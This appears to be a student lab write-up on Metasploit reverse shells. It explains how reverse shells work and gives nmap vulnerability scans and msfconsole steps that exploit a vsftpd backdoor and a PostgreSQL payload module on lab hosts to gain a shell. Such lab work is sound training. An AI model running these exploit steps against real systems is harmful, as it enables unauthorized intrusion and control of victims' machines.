Write-up to the Metasploit Reverse Shell
Metasploit Reverse Shell on localhost
A reverse shell is to be created on Kali. So attacker and victim is localhost.
We use Metasploit for this purpose. Msfvenom belongs to Metasploit and is a payload generator and encoder. The documentation can be found at offensive-security.
You get a list of payloads with it:
msfvenom -l payloads
We use in the exercise the “linux/x86/meterpreterreverse_tcp” which creates a reverse shell, which connects to the Attacker.
How does a reverse shell work? Who opens the TCP connection and to which IP / port?
The attacker/server listens on port 8080 to its own IP and the victim/client connects to it. In other words, the victim opens a shell and then asks the attacker (who listens on port 8080) to connect. With ssh it is the other way around. The server listens to port 22 and opens the shell when the client connects.
Who opens the shell? Who controls it? Which computer executes the commandos entered?
The victim opens the shell and the attacker controls it. The shell is at the victim’s and the commands are executed there as well.
Reverse Shell via vsftpd Exploit
Metasploit is supposed to be used to exploit a vulnerability.
First, I scan for open ports and find the associated services. Then I try to find a vulnerability for a service, which can then be used to create a shell.
The first part, can be done with nmap.
nmap -v --script vuln iloveshells.vm.vuln.land
As a result, you get many MitM possibilities but also a vulnerability concerning ftp-vsftpd-backdoor.
We exploit these as follows:
msfconsole search vsftpd options set RHOSTS = iloveshells.vm.vuln.land
Afterwards we are already on the victim.
Reverse Shell via Postgresql Exploit
We are supposed to get access to a system that was not meant to be online.
nmap -sV 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land msfconsole set RHOSTS 1b215cfe-44e6-4d1d-952c-3aa55d2b63e1.rdocker.vuln.land set RPORT 8181 use exploit/linux/postgres/postgres_payload run
You now have a shell and can do what you need to do.
Good to know
- Nessus does not find everything
- Tools rely on conventions like port 5432
- If something is not default, you have to collect information yourself -> nmap Portscan and Service detection
- The nmap script scan
nmap -v --script vulndid not detect the 8181 port as Postgresql. The vuln is a category and it would be better to use the right script and define the port with -p. to define the port.